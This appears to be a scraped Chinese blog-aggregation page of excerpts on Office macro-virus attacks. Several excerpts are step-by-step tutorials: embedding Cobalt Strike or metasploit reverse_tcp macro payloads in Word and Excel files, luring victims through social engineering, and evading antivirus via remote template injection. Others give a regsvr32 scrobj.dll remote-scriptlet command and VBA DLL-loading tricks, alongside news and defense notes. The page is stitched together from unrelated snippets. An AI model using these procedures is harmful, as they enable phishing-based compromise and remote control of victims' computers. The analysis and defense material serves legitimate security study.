精华内容
下载资源
问答
  • office宏攻击

    2020-12-12 14:17:11
    开启创建CS创建监听器生成代码 思路:CS生成病毒插入到office中 开启 启动office,选项->自定义功能区->开发工具 创建 先创建一个,然后进入vb代码编写界面 CS 创建监听器 生成代码 ...


    思路:CS生成宏病毒插入到office中

    什么是宏

    宏(Macro)是一种批量处理的称谓,是指能组织到一起作为独立的命令使用的一系列Word命令,可以实现任务执行的自动化,简化日常的工作。Microsoft Office使用Visual Basic for Applications(VBA)进行宏的编写。

    注意,在Office中可以直接使用Word的宏函数,而WPS需要安装相关的软件后才能使用。打开WPS Word如下图所示,宏是不能使用的。

    宏病毒

    那么,什么又是宏病毒呢?
    宏病毒是一种寄存在文档或模板的宏中的计算机病毒,存在于数据文件或模板中(字处理文档、数据表格、数据库、演示文档等),使用宏语言编写,利用宏语言的功能将自己寄生到其他数据文档。

    最早的时候,人们认为数据文档是不可能带有病毒的,因为数据文档不包含指令,直到宏病毒出现才改变大家的看法。当我们打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

    开启宏

    启动office,选项->自定义功能区->开发工具
    在这里插入图片描述

    创建宏

    先创建一个宏,然后进入vb代码编写界面
    在这里插入图片描述
    (如果主机上线失败,建议清空vb里面的内容,直接粘贴宏代码)
    在这里插入图片描述

    CS

    创建监听器

    在这里插入图片描述

    生成宏代码

    在这里插入图片描述
    粘贴进去,然后保存,如果出现弹窗说不能保存,选择“是”
    在这里插入图片描述

    保存

    回退到office页面,“保存类型”选择“启用宏的Word文档(*.docm)”
    在这里插入图片描述

    上线

    在这里插入图片描述
    手机收到上线通知,快乐
    在这里插入图片描述
    当然不能免杀了,直接gg,不过有意思的是,虽然office文件被杀毒软件毙了,但是文件还是能打开,然后主机上线了
    在这里插入图片描述

    在这里插入图片描述

    免杀

    免杀方面使用远程加载的方式

    缺点
    目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。

    优点
    因为是远程加载,所以免杀效果十分不错。基本不会被杀毒软件拦截。

    制作恶意文档

    还是熟悉的方式
    在这里插入图片描述
    注意保存类型
    在这里插入图片描述
    接下来先试试能不能用,鼠标右键选择“打开”(双击是“新建”),发现可以上线
    在这里插入图片描述

    上传服务器

    既然是远程加载是需要把刚才制作的恶意文档上传上去,我这里图省事,就用phpstudy了,首先获取到文件路径
    在这里插入图片描述
    接着在URL后面添加?raw=true得到
    在这里插入图片描述

    制作本地文档

    因为是远程加载嘛,所以我们还需要新建一个文档来远程加载服务器上的文档,新家文档的话,随意选择一个模板,双击保存退出
    在这里插入图片描述
    鼠标右键,选择使用解压缩软件打开这个文档,修改Target的值为刚才制作的URL
    在这里插入图片描述

    上线

    打开文档,启用宏
    在这里插入图片描述
    显示有3个主机,是由于前面做测试
    在这里插入图片描述
    在线查杀,也没啥好查的,毕竟只是修改了一下Target的属性
    在这里插入图片描述

    启用火绒

    启动火绒之后
    在这里插入图片描述
    火绒nb,不玩了

    参考:
    钓鱼那些事(初入Office宏攻击)
    钓鱼与社工系列之office宏
    CobaltStrike,你有一台主机上线了
    远程加载含有恶意代码的word模版文件上线CS
    白担心了 原来火绒这样清除病毒并不会删除文件
    宏病毒之入门基础、防御措施、自发邮件及APT28样本分析

    展开全文
  • 摘要:利用metasploit生成病毒代码,放入office文件中;当受害者打开文件时,返回...攻击机:kali(192.168.8.131)攻击演示:1、生成能反弹会话的病毒代码use windows/meterpreter/reverse_tcp set lhost 192...

    摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:

    受害机:win10(192.168.8.123)
    攻击机:kali(192.168.8.131)

    攻击演示:

    1、生成能反弹会话的宏病毒代码

    use windows/meterpreter/reverse_tcp
    set lhost 192.168.8.131
    set lport 8899
    generate -t vba

    2016-11-02_145622.png

    2、将宏病毒植入office文件
    将之前生成的宏病毒代码完整复制出来,新建一个excel文件,录制宏

    2016-11-02_145835.png

    编辑宏

    2016-11-02_145937.png

    打开左侧栏的"This Workbook",将之前复制的宏病毒代码完整的粘贴进去,保存好

    2016-11-02_150022.png

    保存过程中如果有如下提示,点击“否”,另存为“.xlsm”格式(启用宏的excel文件格式)

    2016-11-02_150203.png

    最后生成如下文件

    2016-11-02_150325.png

    3、设置metasploit监听返回会话

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.8.131
    set lport 8899
    exploit

    2016-11-02_150626.png

    利用社会工程学,把此文件诱导受害者点击打开,并启用宏
    成功返回一个meterpreter会话

    2016-11-02_150735.png

    4、总结
    原始生成的宏病毒代码并不具备免杀性质,需要辅以工具来达到免杀效果;
    当受害者关闭带有病毒的文件后,相应的,返回的meterpreter会话也被终止。

    2016-11-02_151044.png
    展开全文
  • 研究人员警告称,攻击者正使用嵌入恶意的 Word 文档和 PowerShell,用非硬盘驻留型恶意软件感染计算机。 带有恶意的 Word 骚扰文档在过去几个月内成为了感染计算机的主流手段之一。如今攻击者更进一步,使用...

    研究人员警告称,攻击者正使用嵌入恶意宏的 Word 文档和 PowerShell,用非硬盘驻留型恶意软件感染计算机。

    带有恶意宏的 Word 骚扰文档在过去几个月内成为了感染计算机的主流手段之一。如今攻击者更进一步,使用此类文档传输非硬盘驻留型(Fileless)恶意软件。这种恶意软件没有文件实体,可以直接加载到受害计算机的内存中。

    安全研究人员分析了近期发生的一次攻击事件。事件中,攻击者向美国、加拿大和欧洲的企业电子邮件地址发送恶意 Word 骚扰文件。他们发送的邮件带有收件人的名字以及公司的详细信息,这在广于撒网的骚扰攻击活动中并不多见。研究人员认为,邮件内容中带有详细信息更有可能引诱受害者打开附件。

    如果受害者打开邮件附件并允许宏,恶意软件将用特定的命令行参数秘密执行 powershell.exe 的一个实例。 Windows PowerShell 是一种任务自动化及配置管理框架,Windows 默认带有该软件,它还有自己的脚本语言。

    这种攻击中执行的 PowerShell 命令被用于检查 Windows 系统是32位还是64位的,并相应下载额外的 PowerShell 脚本。

    恶意脚本会对计算机进行一系列检查。首先,它试图确定运行环境是否为虚拟机或沙盒,就像恶意软件分析师使用的那些一样;之后,它扫描网络配置文件,寻找学校、医院、大学、医疗、护士等字段;它还会扫描网络上的其它计算机,寻找老师、学生、校董会、儿科、整形外科、POS、卖场、商店、销售等字段; 它还会扫描受害计算机上缓存的 URL ,寻找金融网站,以及 Citrix 、XenApp 等字段。

    Palo Alto 研究人员表示,这类检查的目标在于,寻找用于金融转账的系统,并避开属于安全研究人员、医疗和教育机构的系统。只有满足攻击者筛选要求的系统才会被标记并向幕后控制服务器上报。

    恶意脚本会在这些系统上下载加密的恶意 DLL 文件,并将其加载入内存。Palo Alto 公司研究人员在发表的一篇博文中称,“骚扰邮件的内容相当详细,还使用了内存驻留型恶意软件,我们认为这种攻击应当被视为高级别威胁。”

    来自 SANS 研究所互联网风暴中心(Internet Storm Center)的研究人员上周也观测到一种与此类似的攻击活动,过程中结合了 PowerShell 和非硬盘驻留型恶意软件。

    这种恶意软件会创建一个注册表键,在每次系统启动时运行隐藏的 PowerShell 实例。 PowerShell 命令将运行存储在另外的注册表键zho编码过的脚本。这种处理方式可以在不向硬盘写入的前提下将可执行文件解密并直接加载入内存。

    SANS 研究所资深讲师马克·巴吉特(Mark Baggett)在博文中写道:“通过使用 PowerShell ,攻击者能够将可能在硬盘上被检测到的恶意软件放进 Windows 注册表中。”

    将恶意软件存储在注册表中、 通过滥用 Windows PowerShell将恶意宏加到文档上都并不是新技术。然而,两者的结合可能制造强有力且很难发现的攻击。



    本文转自d1net(原创)

    展开全文
  • 本文讲的是在VBA中使用DLL改善攻击功能, 最近对在VBA中使用DLL的大量研究主要集中在如何将shellcode注入到当前运行的进程这一部分,本文就是基于这些研究,向大家展示在VBA中使用DLL改善攻击功能。 大致的...
    本文讲的是在VBA中使用DLL改善宏的攻击功能

    在VBA中使用DLL改善宏的攻击功能

    最近对在VBA中使用DLL的大量研究主要集中在如何将shellcode注入到当前运行的进程这一部分,本文就是基于这些研究,向大家展示在VBA中使用DLL改善宏的攻击功能。

    大致的改善过程分以下2个阶段:

    1.使用已经存在于磁盘上的DLL,执行regsvr32命令,

    2.使用已经存在于磁盘上的DLL, 模拟已经存储到磁盘的合法文件的Office程序。

    没有regsvr32的远程COM Scriptlets

    研究人员Casey Smith所发现的绕过应用程序白名单的其中一项技术就是利用Microsoft签名的二进制regsvr32, regsvr32用于注册和注销OLE控件(例如,DLL和ActiveX)。

    译者注:2016年,研究人员Casey Smith通过解析Windows系统,在AppLocker这一安全保障工具中发现了漏洞。如果命令Regsvr32指向一个远程托管文件,将会获得所有应用程序的系统运行权限。

    总之,regsvr32可以通过HTTP检索远程托管的COM脚本,这其中就包含在注册或注销时执行的代码。 但regsvr32的一个奇怪之处就在于可以同时执行注册和注销,因此在regsvr32退出后不会再注册。

    由于regsvr32是Microsoft签名的二进制文件,可用于绕过应用程序白名单。在Casey Smith的方法中,所使用的regsvr32的命令如下:

    regsvr32 /s /n /u /i:http://someinconspicuoussite.com/file.sct scrobj.dll

    regsvr32的“/ u / i:…”标志表示在名为DllInstall(“/ i”)的scrobj.dll中调用导出的DLL函数,然后取消注册(“/ u”)。对于其中的两个标志,我们要注意的是,首先DllInstall与比较常用的DllRegisterServer不同。虽然它们两个在功能上非常相似,但是DllInstall能够将一个指向“/ i”参数的字符串的指针作为参数,并启用自定义地注册功能。在scrobj.dll的环境下,此字符串可以指向包含COM scriptlet的HTTP资源。除此之外,此命令的注销组件涉及在调用DllInstall时将布尔参数简单地设置为false,并将其函数的上下文更改为“uninstall"”。因此,regsvr32仅用作调用DLL中的导出函数的前端。

    我们可以在VBA中找到一个函数,该函数可以映射到scrobj.dll中的导出的DllInstall函数,我们可以模仿regsvr32的功能,导出的DllInstall函数需要两个参数:false(卸载过的)和指向具有COM Scriplet的URL字符串的指针。

    在VBA中使用DLL改善宏的攻击功能

    我们可以从上图中看到命令已经执行了,不过最重要的一点是,该执行过程没有使用regsvr32的命令行事件日志,因为它不会被执行。而这正是攻击者最理想的攻击方式,因为对于安全监测来说,包含远程资源参数的regsvr32的事件日志是发现恶意活动的明显指标。

    但光有第一阶段显然是不行的,攻击者还需要进入第二阶段的操作过程,以产生新进程或注入到现有进程,否则任何C2通道都将在Office程序关闭后立即丢失。虽然这个过程是不可避免的,但我们可以尽量控制一下,例如,在Cobalt Strike中的标准regsvr32有效载荷内,我们可以直接在VBA函数调用中使用。

    将DLL存储在合法的Office文件中

    将文件放在磁盘上会增加检测的风险,因为这些文件通常在创建的过程通常会有异常的操作,然而,使用VBA可以创建和交互一个DLL,这样异常的Office程序就看起来合法了。可以这么说,这一过程能否成功地实现是整个第二阶段成败的关键。

    首先,应该将DLL存储在Office程序进程将创建文件的位置,在下面的案例中,Word宏用于存储自动恢复文件的DLL(“%appdata% Microsoft  Word”)。这些文件是在Word崩溃时创建的。然而,更重要的是,这里存储的文件应该使用与自动恢复文件相同的文件名和扩展名,例如,自动恢复文件名为Document3.asd,则存储的文件也应该是Document3.asd。我们可以以这种方式命名文件,因为Word不会将DLL的有效扩展名列入白名单。

    其次,与自定义DLL进行交互是有问题的,因为在模块的开头定义时,VBA会将映射到DLL中的导出函数,定义在最前面,并且DLL必须在规定的时间内定义完毕,否则VBA代码本身就会存储到磁盘上。我们可以使用包含定义的第二个VBA模块来解决这个问题。在第一个模块创建完DLL后,然后就可以调用第二个模块中的一个子例程,该子程序可以访问导出的DLL函数。其中我们要解决的主要问题就是从位于一般的路径之外的位置加载DLL。当在函数定义中引用存储的DLL时,我们还无法指定具体的路径,因为我们还不知道目标受害者的用户名,并且该路径还不能包含环境变量(例如“%appdata%”)。因此,我们就必须将文件名指定为当前工作目录中的文件名,而不是存储目录的文件名。为了解决这个问题,我们会使用一个VBA函数来修改VBA的路径,该路径是可以接受环境变量的。这会在第一个模块中调用,修改的运行路径会在第二个模块被调用时仍然存在,最后可以在需要时以标准搜索路径的方式加载DLL了。

    简单归纳起来就是,第一个模块会检索并将DLL存储到具有模拟文件的文件名和非DLL扩展名的磁盘上,等该文件创建后,就可以将VBA的当前工作目录更改为存储DLL的位置。下面的案例就显示Word是如何通过HTTP来检索文件的。它可以包含在VBA本身,但是为了简化代码,到达测试目的,我们这里就把它简单描述为通过HTTP。

    在VBA中使用DLL改善宏的攻击功能

    第二个模块是从DLL调用导出函数的模块,修改以后的当前工作目录会被转移到第二个模块中,并且引用DLL而不指定绝对路径。子程序可以调用导出的函数,如下图中的“run”。

    在上面的案例中,我们通过使用“run”找到一种使Unmanaged PowerShell通过VBA运行的方法,但是在导出的函数中,DLL可以包含任何有效载荷。

    还应该注意的是,软件限制策略(SRP)和AppLocker的“DLL规则”与默认规则集都不会对该攻击具有防御作用。 SRP是基于黑名单的文件扩展名,AppLocker的“DLL规则”则仅限于两个文件扩展名(“.dll”和“.ocx”)。在SRP的环境下,如果不破坏自动恢复功能,则无法阻止此方法的攻击行为,而在AppLocker的环境下,该方法下所使用的扩展名根本就不在“DLL规则”的文件名列表里。

    防御措施

    尽管本文所讲述的这种绕过技术,能让攻击者在攻击时被检测到,但这并不代表就没有办法来进行安全防护。

    从端点的保护角度来看,命令行事件日志仍然很重要。虽然,本文所介绍的第一种技术可以绕过对异常regsvr32的检测,但在第二阶段内,攻击者的活动还是会留下许多操作痕迹的。此外,部署具有强大内存分析功能的端点检测和响应(EDR)解决方案将有助于检测使用诸如DLL注入等技术在其他进程中持久化的有效载荷。

    从网络防御的角度来看,只要我们有了深度的数据包检测,同样也可以检测出本文所讲的这种攻击, 例如,虽然COM脚本没有标准的“.sct”扩展名,但是可以使用常见的扩展名来替代,例如就可以把“.ico”作为Favicon映像,而在第二阶段中下载DLL时,也可以使用“.js” 作为JavaScript的文件名。 




    原文发布时间为:2017年5月21日
    本文作者:xiaohui 
    本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
    展开全文
  • 结果,Nelson发现默认的启动与访问权限存在漏洞,意味着基于攻击无需与受害者交互。 跳板攻击(Pivoting) 如果攻击者成功入侵了一台主机,他就可以任意地利用这台机器作为跳板攻击网络中的其他系统...
  • 利用Powershell执行攻击由于其绕过现有病毒查杀体系的有效性,已经成为目前日益泛滥的攻击手段,不论普遍撒网的勒索软件还是定向的针对性攻击都有可能采用。360天眼实验室一直对此类样本做持续的监测, 5月份以来,...
  • 病毒病毒病毒 仅供参考仅供参考 必要进行恶意攻击
  • Excel 4.0(XLM)是一种具有30年历史的MicrosoftExcel中被遗忘的功能,在过去的一年中被攻击者大规模发掘与利用。攻击者滥用Excel 4.0并将其武器化,以便于帮助其他攻击载荷实现持久化。由于这种攻击方式是对...
  • 文章目录前言远程模板注入执行docx文件格式解析窃取NTLM Hashes小结说明 前言 docx文件可能是病毒吗? 如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx...
  • 如何启用呢?在进行如何启用讲解之前,先来认识,Excel几个其余相关的知识点。如果Excel工作簿中包含,则将在打开工作簿之前对其进行扫描,以检查是否存在已知病毒。Excel设置有四个选项,如下图所示,...
  • 命令

    2019-07-25 00:06:40
    命令 玩过EQ的都知道一点的知识,比如组队时用来告诉队友你的行动,告诉目标等。最简单的比如puller 常用的: /v %t过来了,大家集中火力。 法师常用的: /v 我要催眠%t,大家不要打醒他 这些个性鲜明,是EQ的...
  • 这次的0Day漏洞确实很厉害,以往攻击者诱使用户点击Word文档,由于其中包含了恶意脚本,大多数需要用户启用了。但这次的漏洞不是,受害者无需启用,也会中招,而且漏洞覆盖Windows所有版本(包括Windows 10)。...
  • Word木马

    2021-06-19 15:34:26
    二、如何录制一个使用隐藏文字什么是病毒编写病毒防御措施 前言 本文仅讨论windows office系列,wps系列原理大致相同。 一、是什么? 就是一些命令组织在一起,作为一个单独命令完成一个特定任务。...
  • 使用病毒反弹shell

    2019-05-23 14:09:52
    病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的就会被执行,于是病毒就会被激活,转移到计算机上,并驻留在...kali 攻击机 win7 靶机 生成payload 使用kali虚拟机,输入以下...
  • 猎人

    千次阅读 2006-10-20 20:31:00
    1-放猎人标记并命令pet攻击目标。/cast Hunters Mark(Rank X) .../cast Hunters Mark(Rank X) /script PetFollow()3-选择一个队员然后使用,自动选择该队员的目标,对目标放mark,pet攻击目标,
  • 防治Access病毒

    2020-03-04 01:48:16
    迄今为止,该病毒只在一些私人网站上出现过,微软还未从用户处收到遭攻击的报告。从原理上说,任何使用了VBA作为语言的系统都有产生病毒的可能。微软公司对此提供了防治AccessⅣ病毒的工具,也和专业防病毒厂家...
  • 文档病毒

    2021-07-16 14:16:28
    一方面,结合社会工程学的诱导文档往往能够降低目标人员的安全防范意识,提高攻击的成功率;另一方面,文档可以通过邮件进行传播,而邮件作为最常用的通信方式,对邮箱的攻击,更容易收集用户信息并实现内网渗透。 ...
  • 这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,...这篇文章将分享APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。希望文章对您有所帮助~
  • 我相信每个人都知道excel2016的功能,因此,如果要启用功能,如何启动它?实际上,只要打开excel2016选项的信息中心,就可以看到设置. 单击启用设置怎么启用,然后应如何进行许多设置?让我们与编辑器...
  • 网络攻击

    2020-08-28 16:53:18
    被动攻击(针对路上的东西下手) 概念:就是网络窃听,窃取数据包并进行分析,从中窃取重要的敏感信息 措施:防止被动攻击的主要手段是数据加密传输 主动攻击(针对计算机下手) 概念:包括窃取、篡改、假冒和破坏 措施...
  • Confluence RSS

    2014-03-01 12:10:08
    RSS 用于在 Confluence 页面中嵌入一个 RSS 源。这个 RSS 可以显示外部 RSS 源的内容或者 Confluence 内部创建的 RSS 源。 希望显示博客页面或者空间中的页面最新的更新列表,使用 RSS 构建器 来新建一个 ...
  • 被动攻击(针对路上的东西下手) 概念:就是网络窃听,窃取数据包并进行分析,从中窃取重要的敏感信息 措施:防止被动攻击的主要手段是数据加密传输 主动攻击(针对计算机下手) 概念:包括窃取、篡改、假冒和破坏 ...
  • 利用DOCX文档远程模板注入执行代码 简介 本地文件中在没有代码的情况下,攻击者可以尝试执行远程文件中宏代码。...该种攻击方式与传统的启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 10,793
精华内容 4,317
关键字:

宏攻击